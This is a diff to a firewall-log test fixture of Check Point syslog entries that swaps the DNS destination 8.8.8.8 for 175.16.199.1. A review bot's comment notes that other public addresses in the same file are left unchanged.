FireWall-1[db_tag={BFDA4BB3-8525-054C-8EA5-6B575ED1D020};mgmt=gw-da58d3;date=1585500117;policy_name=Standard\]"; dst:"175.16.199.1"; log_delay:"1585501150"; layer_name:"Network"; layer_uuid:"63b7fe60-76d2-4287-bca5-21af87337b0a"; match_id:"1"; parent_rule:"0"; rule_action:"Accept"; rule_uid:"1fde807b-6300-4b1a-914f-f1c1f3e2e7d2"; product:"VPN-1 & FireWall-1"; proto:"17"; s_port:"38362"; service:"53"; service_id:"domain-udp"; src:"192.168.2.2"] <134>1 2020-03-29T16:59:10Z gw-da58d3 CheckPoint 1930 - [action:"Accept"; conn_direction:"Internal"; flags:"4606214"; ifdir:"inbound"; ifname:"eth1"; logid:"0"; loguid:"{0x5e80d3de,0x0,0x60e0fe3b,0xda019994}"; origin:"192.168.1.100"; originsicname:"cn=cp_mgmt,o=gw-da58d3..tmn8s8"; sequencenum:"6"; version:"5"; __policy_id_tag:"product=VPN-1 & FireWall-1[db_tag={BFDA4BB3-8525-054C-8EA5-6B575ED1D020};mgmt=gw-da58d3;date=1585500117;policy_name=Standard\]"; dst:"194.29.39.47"; log_delay:"1585501150"; layer_name:"Network"; layer_uuid:"63b7fe60-76d2-4287-bca5-21af87337b0a"; match_id:"1"; parent_rule:"0"; rule_action:"Accept"; rule_uid:"1fde807b-6300-4b1a-914f-f1c1f3e2e7d2"; product:"VPN-1 & FireWall-1"; proto:"6"; s_port:"33744"; service:"443"; service_id:"https"; src:"192.168.2.2"] <134>1 2020-03-29T16:59:17Z gw-da58d3 CheckPoint 1930 - [action:"Drop"; flags:"395524"; ifdir:"inbound"; ifname:"eth0"; logid:"0"; loguid:"{0x5e80d3e6,0x0,0x6401a8c0,0x3c7878a}"; origin:"192.168.1.100"; originsicname:"cn=cp_mgmt,o=gw-da58d3..tmn8s8"; sequencenum:"2"; version:"5"; __policy_id_tag:"product=VPN-1 & FireWall-1[db_tag={BFDA4BB3-8525-054C-8EA5-6B575ED1D020};mgmt=gw-da58d3;date=1585500117;policy_name=Standard\]"; dst:"255.255.255.255"; inzone:"Internal"; layer_name:"Network"; layer_uuid:"63b7fe60-76d2-4287-bca5-21af87337b0a"; match_id:"3"; parent_rule:"0"; rule_action:"Drop"; rule_name:"Cleanup rule"; rule_uid:"76fd22f2-efa8-4c81-a617-40201d3f5c4e"; outzone:"Local"; product:"VPN-1 & FireWall-1"; proto:"17"; s_port:"68"; service:"67"; 
service_id:"bootp"; src:"0.0.0.0"] <134>1 2020-03-29T16:59:17Z gw-da58d3 CheckPoint 1930 - [action:"Accept"; flags:"411908"; ifdir:"inbound"; ifname:"eth0"; logid:"0"; loguid:"{0x5e80d3e5,0x0,0x60e0fe3b,0xda019994}"; origin:"192.168.1.100"; originsicname:"cn=cp_mgmt,o=gw-da58d3..tmn8s8"; sequencenum:"3"; version:"5"; __policy_id_tag:"product=VPN-1 & FireWall-1[db_tag={BFDA4BB3-8525-054C-8EA5-6B575ED1D020};mgmt=gw-da58d3;date=1585500117;policy_name=Standard\]"; dst:"255.255.255.255"; inzone:"Internal"; layer_name:"Network"; layer_uuid:"63b7fe60-76d2-4287-bca5-21af87337b0a"; match_id:"1"; parent_rule:"0"; rule_action:"Accept"; rule_uid:"1fde807b-6300-4b1a-914f-f1c1f3e2e7d2"; outzone:"Local"; product:"VPN-1 & FireWall-1"; proto:"17"; s_port:"67"; service:"68"; service_id:"dhcp-rep-localmodule"; src:"192.168.1.1"] 
@@ -1859,7 +1859,7 @@
 <134>1 2020-03-29T16:59:17Z gw-da58d3 CheckPoint 1930 - [action:"Accept"; flags:"444676"; ifdir:"outbound"; ifname:"eth0"; logid:"0"; loguid:"{0x5e80d3e5,0x0,0x1cae0484,0xf99c33e9}"; origin:"192.168.1.100"; originsicname:"cn=cp_mgmt,o=gw-da58d3..tmn8s8"; sequencenum:"5"; version:"5"; __policy_id_tag:"product=VPN-1 & FireWall-1[db_tag={BFDA4BB3-8525-054C-8EA5-6B575ED1D020};mgmt=gw-da58d3;date=1585500117;policy_name=Standard\]"; dst:"192.168.1.1"; inzone:"Local"; layer_name:"Network"; layer_uuid:"63b7fe60-76d2-4287-bca5-21af87337b0a"; match_id:"1"; parent_rule:"0"; rule_action:"Accept"; rule_uid:"1fde807b-6300-4b1a-914f-f1c1f3e2e7d2"; outzone:"Internal"; product:"VPN-1 & FireWall-1"; proto:"17"; s_port:"64032"; service:"53"; service_id:"domain-udp"; src:"192.168.1.100"]
 <134>1 2020-03-29T16:59:20Z gw-da58d3 CheckPoint 1930 - [action:"Accept"; flags:"444676"; ifdir:"outbound"; ifname:"eth0"; logid:"0"; loguid:"{0x5e80d3e8,0x0,0x1cae0484,0xf99c33e9}"; origin:"192.168.1.100"; originsicname:"cn=cp_mgmt,o=gw-da58d3..tmn8s8"; sequencenum:"1"; version:"5"; __policy_id_tag:"product=VPN-1 & FireWall-1[db_tag={BFDA4BB3-8525-054C-8EA5-6B575ED1D020};mgmt=gw-da58d3;date=1585500117;policy_name=Standard\]"; dst:"192.168.1.1"; inzone:"Local"; layer_name:"Network"; layer_uuid:"63b7fe60-76d2-4287-bca5-21af87337b0a"; match_id:"1"; parent_rule:"0"; rule_action:"Accept"; rule_uid:"1fde807b-6300-4b1a-914f-f1c1f3e2e7d2"; outzone:"Internal"; product:"VPN-1 & FireWall-1"; proto:"17"; s_port:"57641"; service:"53"; service_id:"domain-udp"; src:"192.168.1.100"]
 <134>1 2020-03-29T16:59:20Z gw-da58d3 CheckPoint 1930 - [action:"Accept"; flags:"444676"; ifdir:"outbound"; ifname:"eth0"; logid:"0"; loguid:"{0x5e80d3e8,0x0,0x60e0fe3b,0xda019994}"; origin:"192.168.1.100"; originsicname:"cn=cp_mgmt,o=gw-da58d3..tmn8s8"; sequencenum:"2"; version:"5"; __policy_id_tag:"product=VPN-1 & FireWall-1[db_tag={BFDA4BB3-8525-054C-8EA5-6B575ED1D020};mgmt=gw-da58d3;date=1585500117;policy_name=Standard\]"; dst:"192.168.1.1"; inzone:"Local"; layer_name:"Network"; layer_uuid:"63b7fe60-76d2-4287-bca5-21af87337b0a"; match_id:"1"; parent_rule:"0"; rule_action:"Accept"; rule_uid:"1fde807b-6300-4b1a-914f-f1c1f3e2e7d2"; outzone:"Internal"; product:"VPN-1 & FireWall-1"; proto:"17"; s_port:"63679"; service:"53"; service_id:"domain-udp"; src:"192.168.1.100"]
-<134>1 2020-03-29T16:59:25Z gw-da58d3 CheckPoint 1930 - [action:"Accept"; flags:"444676"; ifdir:"outbound"; ifname:"eth0"; logid:"0"; loguid:"{0x5e80d3ed,0x0,0x1cae0484,0xf99c33e9}"; origin:"192.168.1.100"; originsicname:"cn=cp_mgmt,o=gw-da58d3..tmn8s8"; sequencenum:"1"; version:"5"; __policy_id_tag:"product=VPN-1 & FireWall-1[db_tag={BFDA4BB3-8525-054C-8EA5-6B575ED1D020};mgmt=gw-da58d3;date=1585500117;policy_name=Standard\]"; dst:"8.8.8.8"; inzone:"Local"; layer_name:"Network"; layer_uuid:"63b7fe60-76d2-4287-bca5-21af87337b0a"; match_id:"1"; parent_rule:"0"; rule_action:"Accept"; rule_uid:"1fde807b-6300-4b1a-914f-f1c1f3e2e7d2"; outzone:"Internal"; product:"VPN-1 & FireWall-1"; proto:"17"; s_port:"62590"; service:"53"; service_id:"domain-udp"; src:"192.168.1.100"]
+<134>1 2020-03-29T16:59:25Z gw-da58d3 CheckPoint 1930 - [action:"Accept"; flags:"444676"; ifdir:"outbound"; ifname:"eth0"; logid:"0"; loguid:"{0x5e80d3ed,0x0,0x1cae0484,0xf99c33e9}"; origin:"192.168.1.100"; originsicname:"cn=cp_mgmt,o=gw-da58d3..tmn8s8"; sequencenum:"1"; version:"5"; __policy_id_tag:"product=VPN-1 & FireWall-1[db_tag={BFDA4BB3-8525-054C-8EA5-6B575ED1D020};mgmt=gw-da58d3;date=1585500117;policy_name=Standard\]"; dst:"175.16.199.1"; inzone:"Local"; layer_name:"Network"; layer_uuid:"63b7fe60-76d2-4287-bca5-21af87337b0a"; match_id:"1"; parent_rule:"0"; rule_action:"Accept"; rule_uid:"1fde807b-6300-4b1a-914f-f1c1f3e2e7d2"; outzone:"Internal"; product:"VPN-1 & FireWall-1"; proto:"17"; s_port:"62590"; service:"53"; service_id:"domain-udp"; src:"192.168.1.100"]
 <134>1 2020-03-29T16:59:25Z gw-da58d3 CheckPoint 1930 - [action:"Accept"; flags:"444676"; ifdir:"outbound"; ifname:"eth0"; logid:"0"; loguid:"{0x5e80d3ed,0x0,0xbba3afa,0xd2c10858}"; origin:"192.168.1.100"; originsicname:"cn=cp_mgmt,o=gw-da58d3..tmn8s8"; sequencenum:"2"; version:"5"; __policy_id_tag:"product=VPN-1 & FireWall-1[db_tag={BFDA4BB3-8525-054C-8EA5-6B575ED1D020};mgmt=gw-da58d3;date=1585500117;policy_name=Standard\]"; dst:"192.168.1.1"; inzone:"Local"; layer_name:"Network"; layer_uuid:"63b7fe60-76d2-4287-bca5-21af87337b0a"; match_id:"1"; parent_rule:"0"; rule_action:"Accept"; rule_uid:"1fde807b-6300-4b1a-914f-f1c1f3e2e7d2"; outzone:"Internal"; product:"VPN-1 & FireWall-1"; proto:"17"; s_port:"64193"; service:"53"; service_id:"domain-udp"; src:"192.168.1.100"]
 <134>1 2020-03-29T16:59:25Z gw-da58d3 CheckPoint 1930 - [action:"Accept"; flags:"444676"; ifdir:"outbound"; ifname:"eth0"; logid:"0"; loguid:"{0x5e80d3ed,0x1,0x1cae0484,0xf99c33e9}"; origin:"192.168.1.100"; originsicname:"cn=cp_mgmt,o=gw-da58d3..tmn8s8"; sequencenum:"3"; version:"5"; __policy_id_tag:"product=VPN-1 & FireWall-1[db_tag={BFDA4BB3-8525-054C-8EA5-6B575ED1D020};mgmt=gw-da58d3;date=1585500117;policy_name=Standard\]"; dst:"192.168.1.1"; inzone:"Local"; layer_name:"Network"; layer_uuid:"63b7fe60-76d2-4287-bca5-21af87337b0a"; match_id:"1"; parent_rule:"0"; rule_action:"Accept"; rule_uid:"1fde807b-6300-4b1a-914f-f1c1f3e2e7d2"; outzone:"Internal"; product:"VPN-1 & FireWall-1"; proto:"17"; s_port:"45685"; service:"53"; service_id:"domain-udp"; src:"192.168.1.100"]
 <134>1 2020-03-29T16:59:26Z gw-da58d3 CheckPoint 1930 - [action:"Accept"; flags:"444676"; ifdir:"outbound"; ifname:"eth0"; logid:"0"; loguid:"{0x5e80d3ee,0x0,0x60e0fe3b,0xda019994}"; origin:"192.168.1.100"; originsicname:"cn=cp_mgmt,o=gw-da58d3..tmn8s8"; sequencenum:"1"; version:"5"; __policy_id_tag:"product=VPN-1 & FireWall-1[db_tag={BFDA4BB3-8525-054C-8EA5-6B575ED1D020};mgmt=gw-da58d3;date=1585500117;policy_name=Standard\]"; dst:"192.168.1.153"; inzone:"Local"; layer_name:"Network"; layer_uuid:"63b7fe60-76d2-4287-bca5-21af87337b0a"; match_id:"1"; parent_rule:"0"; rule_action:"Accept"; rule_uid:"1fde807b-6300-4b1a-914f-f1c1f3e2e7d2"; outzone:"Internal"; product:"VPN-1 & FireWall-1"; proto:"17"; s_port:"44917"; service:"514"; service_id:"syslog"; src:"192.168.1.100"]
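Review bot: Only `8.8.8.8` is rewritten to `175.16.199.1` in this hunk and in the one at `@@ -1875,12 +1875,12 @@`, while other routable public addresses in the surrounding context lines of the same fixture — `34.215.75.150` in the 1875 hunk, `209.87.209.101`, `194.29.39.47` and `172.217.17.35` in the preceding one — are left untouched. If the intent is to keep real public addresses out of test data, or to make any geo enrichment exercised by the test resolve deterministically, the substitution looks incomplete in this file; if the intent is narrower (only dropping that one resolver address), a sentence in the PR description saying so would spare the next reader the question. Any expected-output file paired with this fixture would presumably need the same `dst` change, which this chunk does not show.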
@@ -1875,12 +1875,12 @@
 <134>1 2020-03-29T16:59:28Z gw-da58d3 CheckPoint 1930 - [action:"Accept"; flags:"411908"; ifdir:"inbound"; ifname:"eth0"; logid:"0"; loguid:"{0x5e80d3f0,0x1,0x1cae0484,0xf99c33e9}"; origin:"192.168.1.100"; originsicname:"cn=cp_mgmt,o=gw-da58d3..tmn8s8"; sequencenum:"2"; version:"5"; __policy_id_tag:"product=VPN-1 & FireWall-1[db_tag={BFDA4BB3-8525-054C-8EA5-6B575ED1D020};mgmt=gw-da58d3;date=1585500117;policy_name=Standard\]"; dst:"192.168.1.100"; inzone:"Internal"; layer_name:"Network"; layer_uuid:"63b7fe60-76d2-4287-bca5-21af87337b0a"; match_id:"1"; parent_rule:"0"; rule_action:"Accept"; rule_uid:"1fde807b-6300-4b1a-914f-f1c1f3e2e7d2"; outzone:"Local"; product:"VPN-1 & FireWall-1"; proto:"6"; s_port:"50073"; service:"443"; service_id:"https"; src:"192.168.1.117"]
 <134>1 2020-03-29T16:59:29Z gw-da58d3 CheckPoint 1930 - [action:"Accept"; flags:"411908"; ifdir:"inbound"; ifname:"eth0"; logid:"0"; loguid:"{0x5e80d3f1,0x0,0x60e0fe3b,0xda019994}"; origin:"192.168.1.100"; originsicname:"cn=cp_mgmt,o=gw-da58d3..tmn8s8"; sequencenum:"1"; version:"5"; __policy_id_tag:"product=VPN-1 & FireWall-1[db_tag={BFDA4BB3-8525-054C-8EA5-6B575ED1D020};mgmt=gw-da58d3;date=1585500117;policy_name=Standard\]"; dst:"192.168.1.100"; inzone:"Internal"; layer_name:"Network"; layer_uuid:"63b7fe60-76d2-4287-bca5-21af87337b0a"; match_id:"1"; parent_rule:"0"; rule_action:"Accept"; rule_uid:"1fde807b-6300-4b1a-914f-f1c1f3e2e7d2"; outzone:"Local"; product:"VPN-1 & FireWall-1"; proto:"6"; s_port:"50074"; service:"443"; service_id:"https"; src:"192.168.1.117"]
 <134>1 2020-03-29T16:59:29Z gw-da58d3 CheckPoint 1930 - [action:"Accept"; flags:"411908"; ifdir:"inbound"; ifname:"eth0"; logid:"0"; loguid:"{0x5e80d3f1,0x0,0xbba3afa,0xd2c10858}"; origin:"192.168.1.100"; originsicname:"cn=cp_mgmt,o=gw-da58d3..tmn8s8"; sequencenum:"2"; version:"5"; __policy_id_tag:"product=VPN-1 & FireWall-1[db_tag={BFDA4BB3-8525-054C-8EA5-6B575ED1D020};mgmt=gw-da58d3;date=1585500117;policy_name=Standard\]"; dst:"192.168.1.100"; inzone:"Internal"; layer_name:"Network"; layer_uuid:"63b7fe60-76d2-4287-bca5-21af87337b0a"; match_id:"1"; parent_rule:"0"; rule_action:"Accept"; rule_uid:"1fde807b-6300-4b1a-914f-f1c1f3e2e7d2"; outzone:"Local"; product:"VPN-1 & FireWall-1"; proto:"6"; s_port:"50075"; service:"443"; service_id:"https"; src:"192.168.1.117"]
-<134>1 2020-03-29T16:59:30Z gw-da58d3 CheckPoint 1930 - [action:"Accept"; flags:"444676"; ifdir:"outbound"; ifname:"eth0"; logid:"0"; loguid:"{0x5e80d3f2,0x0,0x1cae0484,0xf99c33e9}"; origin:"192.168.1.100"; originsicname:"cn=cp_mgmt,o=gw-da58d3..tmn8s8"; sequencenum:"1"; version:"5"; __policy_id_tag:"product=VPN-1 & FireWall-1[db_tag={BFDA4BB3-8525-054C-8EA5-6B575ED1D020};mgmt=gw-da58d3;date=1585500117;policy_name=Standard\]"; dst:"8.8.8.8"; inzone:"Local"; layer_name:"Network"; layer_uuid:"63b7fe60-76d2-4287-bca5-21af87337b0a"; match_id:"1"; parent_rule:"0"; rule_action:"Accept"; rule_uid:"1fde807b-6300-4b1a-914f-f1c1f3e2e7d2"; outzone:"Internal"; product:"VPN-1 & FireWall-1"; proto:"17"; s_port:"44075"; service:"53"; service_id:"domain-udp"; src:"192.168.1.100"]
+<134>1 2020-03-29T16:59:30Z gw-da58d3 CheckPoint 1930 - [action:"Accept"; flags:"444676"; ifdir:"outbound"; ifname:"eth0"; logid:"0"; loguid:"{0x5e80d3f2,0x0,0x1cae0484,0xf99c33e9}"; origin:"192.168.1.100"; originsicname:"cn=cp_mgmt,o=gw-da58d3..tmn8s8"; sequencenum:"1"; version:"5"; __policy_id_tag:"product=VPN-1 & FireWall-1[db_tag={BFDA4BB3-8525-054C-8EA5-6B575ED1D020};mgmt=gw-da58d3;date=1585500117;policy_name=Standard\]"; dst:"175.16.199.1"; inzone:"Local"; layer_name:"Network"; layer_uuid:"63b7fe60-76d2-4287-bca5-21af87337b0a"; match_id:"1"; parent_rule:"0"; rule_action:"Accept"; rule_uid:"1fde807b-6300-4b1a-914f-f1c1f3e2e7d2"; outzone:"Internal"; product:"VPN-1 & FireWall-1"; proto:"17"; s_port:"44075"; service:"53"; service_id:"domain-udp"; src:"192.168.1.100"]
 <134>1 2020-03-29T16:59:33Z gw-da58d3 CheckPoint 1930 - [action:"Accept"; flags:"444676"; ifdir:"outbound"; ifname:"eth0"; logid:"0"; loguid:"{0x5e80d3f5,0x0,0x60e0fe3b,0xda019994}"; origin:"192.168.1.100"; originsicname:"cn=cp_mgmt,o=gw-da58d3..tmn8s8"; sequencenum:"1"; version:"5"; __policy_id_tag:"product=VPN-1 & FireWall-1[db_tag={BFDA4BB3-8525-054C-8EA5-6B575ED1D020};mgmt=gw-da58d3;date=1585500117;policy_name=Standard\]"; dst:"192.168.1.1"; inzone:"Local"; layer_name:"Network"; layer_uuid:"63b7fe60-76d2-4287-bca5-21af87337b0a"; match_id:"1"; parent_rule:"0"; rule_action:"Accept"; rule_uid:"1fde807b-6300-4b1a-914f-f1c1f3e2e7d2"; outzone:"Internal"; product:"VPN-1 & FireWall-1"; proto:"17"; s_port:"62639"; service:"53"; service_id:"domain-udp"; src:"192.168.1.100"]
 <134>1 2020-03-29T16:59:43Z gw-da58d3 CheckPoint 1930 - [action:"Accept"; flags:"444676"; ifdir:"outbound"; ifname:"eth0"; logid:"0"; loguid:"{0x5e80d3fe,0x0,0x1cae0484,0xf99c33e9}"; origin:"192.168.1.100"; originsicname:"cn=cp_mgmt,o=gw-da58d3..tmn8s8"; sequencenum:"1"; version:"5"; __policy_id_tag:"product=VPN-1 & FireWall-1[db_tag={BFDA4BB3-8525-054C-8EA5-6B575ED1D020};mgmt=gw-da58d3;date=1585500117;policy_name=Standard\]"; dst:"192.168.1.1"; inzone:"Local"; layer_name:"Network"; layer_uuid:"63b7fe60-76d2-4287-bca5-21af87337b0a"; match_id:"1"; parent_rule:"0"; rule_action:"Accept"; rule_uid:"1fde807b-6300-4b1a-914f-f1c1f3e2e7d2"; outzone:"Internal"; product:"VPN-1 & FireWall-1"; proto:"17"; s_port:"54421"; service:"53"; service_id:"domain-udp"; src:"192.168.1.100"]
-<134>1 2020-03-29T16:59:44Z gw-da58d3 CheckPoint 1930 - [action:"Accept"; conn_direction:"Internal"; flags:"4606214"; ifdir:"inbound"; ifname:"eth1"; logid:"0"; loguid:"{0x5e80d400,0x0,0xbba3afa,0xd2c10858}"; origin:"192.168.1.100"; originsicname:"cn=cp_mgmt,o=gw-da58d3..tmn8s8"; sequencenum:"1"; version:"5"; __policy_id_tag:"product=VPN-1 & FireWall-1[db_tag={BFDA4BB3-8525-054C-8EA5-6B575ED1D020};mgmt=gw-da58d3;date=1585500117;policy_name=Standard\]"; dst:"8.8.8.8"; log_delay:"1585501184"; layer_name:"Network"; layer_uuid:"63b7fe60-76d2-4287-bca5-21af87337b0a"; match_id:"1"; parent_rule:"0"; rule_action:"Accept"; rule_uid:"1fde807b-6300-4b1a-914f-f1c1f3e2e7d2"; product:"VPN-1 & FireWall-1"; proto:"17"; s_port:"54376"; service:"53"; service_id:"domain-udp"; src:"192.168.2.2"]
+<134>1 2020-03-29T16:59:44Z gw-da58d3 CheckPoint 1930 - [action:"Accept"; conn_direction:"Internal"; flags:"4606214"; ifdir:"inbound"; ifname:"eth1"; logid:"0"; loguid:"{0x5e80d400,0x0,0xbba3afa,0xd2c10858}"; origin:"192.168.1.100"; originsicname:"cn=cp_mgmt,o=gw-da58d3..tmn8s8"; sequencenum:"1"; version:"5"; __policy_id_tag:"product=VPN-1 & FireWall-1[db_tag={BFDA4BB3-8525-054C-8EA5-6B575ED1D020};mgmt=gw-da58d3;date=1585500117;policy_name=Standard\]"; dst:"175.16.199.1"; log_delay:"1585501184"; layer_name:"Network"; layer_uuid:"63b7fe60-76d2-4287-bca5-21af87337b0a"; match_id:"1"; parent_rule:"0"; rule_action:"Accept"; rule_uid:"1fde807b-6300-4b1a-914f-f1c1f3e2e7d2"; product:"VPN-1 & FireWall-1"; proto:"17"; s_port:"54376"; service:"53"; service_id:"domain-udp"; src:"192.168.2.2"]
 <134>1 2020-03-29T16:59:44Z gw-da58d3 CheckPoint 1930 - [action:"Accept"; flags:"411908"; ifdir:"inbound"; ifname:"eth1"; logid:"0"; loguid:"{0x5e80d400,0x0,0x1cae0484,0xf99c33e9}"; origin:"192.168.1.100"; originsicname:"cn=cp_mgmt,o=gw-da58d3..tmn8s8"; sequencenum:"2"; version:"5"; __policy_id_tag:"product=VPN-1 & FireWall-1[db_tag={BFDA4BB3-8525-054C-8EA5-6B575ED1D020};mgmt=gw-da58d3;date=1585500117;policy_name=Standard\]"; dst:"34.215.75.150"; inzone:"Internal"; layer_name:"Network"; layer_uuid:"63b7fe60-76d2-4287-bca5-21af87337b0a"; match_id:"1"; parent_rule:"0"; rule_action:"Accept"; rule_uid:"1fde807b-6300-4b1a-914f-f1c1f3e2e7d2"; outzone:"Internal"; product:"VPN-1 & FireWall-1"; proto:"6"; s_port:"37726"; service:"443"; service_id:"https"; src:"192.168.2.2"]
-<134>1 2020-03-29T16:59:44Z gw-da58d3 CheckPoint 1930 - [action:"Accept"; conn_direction:"Internal"; flags:"4606214"; ifdir:"inbound"; ifname:"eth1"; logid:"0"; loguid:"{0x5e80d400,0x0,0x60e0fe3b,0xda019994}"; origin:"192.168.1.100"; originsicname:"cn=cp_mgmt,o=gw-da58d3..tmn8s8"; sequencenum:"3"; version:"5"; __policy_id_tag:"product=VPN-1 & FireWall-1[db_tag={BFDA4BB3-8525-054C-8EA5-6B575ED1D020};mgmt=gw-da58d3;date=1585500117;policy_name=Standard\]"; dst:"8.8.8.8"; log_delay:"1585501184"; layer_name:"Network"; layer_uuid:"63b7fe60-76d2-4287-bca5-21af87337b0a"; match_id:"1"; parent_rule:"0"; rule_action:"Accept"; rule_uid:"1fde807b-6300-4b1a-914f-f1c1f3e2e7d2"; product:"VPN-1 & FireWall-1"; proto:"17"; s_port:"47519"; service:"53"; service_id:"domain-udp"; src:"192.168.2.2"]
+<134>1 2020-03-29T16:59:44Z gw-da58d3 CheckPoint 1930 - [action:"Accept"; conn_direction:"Internal"; flags:"4606214"; ifdir:"inbound"; ifname:"eth1"; logid:"0"; loguid:"{0x5e80d400,0x0,0x60e0fe3b,0xda019994}"; origin:"192.168.1.100"; originsicname:"cn=cp_mgmt,o=gw-da58d3..tmn8s8"; sequencenum:"3"; version:"5"; __policy_id_tag:"product=VPN-1 & FireWall-1[db_tag={BFDA4BB3-8525-054C-8EA5-6B575ED1D020};mgmt=gw-da58d3;date=1585500117;policy_name=Standard\]"; dst:"175.16.199.1"; log_delay:"1585501184"; layer_name:"Network"; layer_uuid:"63b7fe60-76d2-4287-bca5-21af87337b0a"; match_id:"1"; parent_rule:"0"; rule_action:"Accept"; rule_uid:"1fde807b-6300-4b1a-914f-f1c1f3e2e7d2"; product:"VPN-1 & FireWall-1"; proto:"17"; s_port:"47519"; service:"53"; service_id:"domain-udp"; src:"192.168.2.2"]
 <134>1 2020-03-29T16:59:53Z gw-da58d3 CheckPoint 1930 - [action:"Accept"; flags:"411908"; ifdir:"inbound"; ifname:"eth0"; logid:"0"; loguid:"{0x5e80d409,0x0,0xbba3afa,0xd2c10858}"; origin:"192.168.1.100"; originsicname:"cn=cp_mgmt,o=gw-da58d3..tmn8s8"; sequencenum:"1"; version:"5"; __policy_id_tag:"product=VPN-1 & FireWall-1[db_tag={BFDA4BB3-8525-054C-8EA5-6B575ED1D020};mgmt=gw-da58d3;date=1585500117;policy_name=Standard\]"; dst:"192.168.1.100"; inzone:"Internal"; layer_name:"Network"; layer_uuid:"63b7fe60-76d2-4287-bca5-21af87337b0a"; match_id:"1"; parent_rule:"0"; rule_action:"Accept"; rule_uid:"1fde807b-6300-4b1a-914f-f1c1f3e2e7d2"; outzone:"Local"; product:"VPN-1 & FireWall-1"; proto:"6"; s_port:"50076"; service:"443"; service_id:"https"; src:"192.168.1.117"]
 <134>1 2020-03-29T16:59:53Z gw-da58d3 CheckPoint 1930 - [action:"Accept"; flags:"411908"; ifdir:"inbound"; ifname:"eth0"; logid:"0"; loguid:"{0x5e80d409,0x0,0x1cae0484,0xf99c33e9}"; origin:"192.168.1.100"; originsicname:"cn=cp_mgmt,o=gw-da58d3..tmn8s8"; sequencenum:"2"; version:"5"; __policy_id_tag:"product=VPN-1 & FireWall-1[db_tag={BFDA4BB3-8525-054C-8EA5-6B575ED1D020};mgmt=gw-da58d3;date=1585500117;policy_name=Standard\]"; dst:"192.168.1.100"; inzone:"Internal"; layer_name:"Network"; layer_uuid:"63b7fe60-76d2-4287-bca5-21af87337b0a"; match_id:"1"; parent_rule:"0"; rule_action:"Accept"; rule_uid:"1fde807b-6300-4b1a-914f-f1c1f3e2e7d2"; outzone:"Local"; product:"VPN-1 & FireWall-1"; proto:"6"; s_port:"50077"; service:"443"; service_id:"https"; src:"192.168.1.117"]
 <134>1 2020-03-29T17:00:03Z gw-da58d3 CheckPoint 1930 - [action:"Accept"; flags:"411908"; ifdir:"inbound"; ifname:"eth0"; logid:"0"; loguid:"{0x5e80d413,0x0,0x60e0fe3b,0xda019994}"; origin:"192.168.1.100"; originsicname:"cn=cp_mgmt,o=gw-da58d3..tmn8s8"; sequencenum:"1"; version:"5"; __policy_id_tag:"product=VPN-1 & FireWall-1[db_tag={BFDA4BB3-8525-054C-8EA5-6B575ED1D020};mgmt=gw-da58d3;date=1585500117;policy_name=Standard\]"; dst:"192.168.1.255"; inzone:"Internal"; layer_name:"Network"; layer_uuid:"63b7fe60-76d2-4287-bca5-21af87337b0a"; match_id:"1"; parent_rule:"0"; rule_action:"Accept"; rule_uid:"1fde807b-6300-4b1a-914f-f1c1f3e2e7d2"; outzone:"Local"; product:"VPN-1 & FireWall-1"; proto:"17"; s_port:"137"; service:"137"; service_id:"nbname"; src:"192.168.1.94"]
@@ -1891,7 +1891,7 @@
 <134>1 2020-03-29T17:00:22Z gw-da58d3 CheckPoint 1930 - [action:"Accept"; flags:"444676"; ifdir:"outbound"; ifname:"eth0"; logid:"0"; loguid:"{0x5e80d426,0x1,0x60e0fe3b,0xda019994}"; origin:"192.168.1.100"; originsicname:"cn=cp_mgmt,o=gw-da58d3..tmn8s8"; sequencenum:"5"; version:"5"; __policy_id_tag:"product=VPN-1 & FireWall-1[db_tag={BFDA4BB3-8525-054C-8EA5-6B575ED1D020};mgmt=gw-da58d3;date=1585500117;policy_name=Standard\]"; dst:"192.168.1.1"; inzone:"Local"; layer_name:"Network"; layer_uuid:"63b7fe60-76d2-4287-bca5-21af87337b0a"; match_id:"1"; parent_rule:"0"; rule_action:"Accept"; rule_uid:"1fde807b-6300-4b1a-914f-f1c1f3e2e7d2"; outzone:"Internal"; product:"VPN-1 & FireWall-1"; proto:"17"; s_port:"50637"; service:"53"; service_id:"domain-udp"; src:"192.168.1.100"]
 <134>1 2020-03-29T17:00:22Z gw-da58d3 CheckPoint 1930 - [action:"Accept"; flags:"444676"; ifdir:"outbound"; ifname:"eth0"; logid:"0"; loguid:"{0x5e80d426,0x2,0x60e0fe3b,0xda019994}"; origin:"192.168.1.100"; originsicname:"cn=cp_mgmt,o=gw-da58d3..tmn8s8"; sequencenum:"6"; version:"5"; __policy_id_tag:"product=VPN-1 & FireWall-1[db_tag={BFDA4BB3-8525-054C-8EA5-6B575ED1D020};mgmt=gw-da58d3;date=1585500117;policy_name=Standard\]"; dst:"192.124.249.36"; inzone:"Local"; layer_name:"Network"; layer_uuid:"63b7fe60-76d2-4287-bca5-21af87337b0a"; match_id:"1"; parent_rule:"0"; rule_action:"Accept"; rule_uid:"1fde807b-6300-4b1a-914f-f1c1f3e2e7d2"; nat_addtnl_rulenum:"0"; nat_rulenum:"0"; outzone:"Internal"; product:"VPN-1 & FireWall-1"; proto:"6"; s_port:"33828"; service:"80"; service_id:"http"; src:"192.168.1.100"; xlatedport:"0"; xlatedst:"0.0.0.0"; xlatesport:"10231"; xlatesrc:"0.0.0.0"]
 <134>1 2020-03-29T17:00:23Z gw-da58d3 CheckPoint 1930 - [action:"Accept"; flags:"444676"; ifdir:"outbound"; ifname:"eth0"; logid:"0"; loguid:"{0x5e80d427,0x0,0xbba3afa,0xd2c10858}"; origin:"192.168.1.100"; originsicname:"cn=cp_mgmt,o=gw-da58d3..tmn8s8"; sequencenum:"1"; version:"5"; __policy_id_tag:"product=VPN-1 & FireWall-1[db_tag={BFDA4BB3-8525-054C-8EA5-6B575ED1D020};mgmt=gw-da58d3;date=1585500117;policy_name=Standard\]"; dst:"192.168.1.153"; inzone:"Local"; layer_name:"Network"; layer_uuid:"63b7fe60-76d2-4287-bca5-21af87337b0a"; match_id:"1"; parent_rule:"0"; rule_action:"Accept"; rule_uid:"1fde807b-6300-4b1a-914f-f1c1f3e2e7d2"; outzone:"Internal"; product:"VPN-1 & FireWall-1"; proto:"17"; s_port:"44917"; service:"514"; service_id:"syslog"; src:"192.168.1.100"]
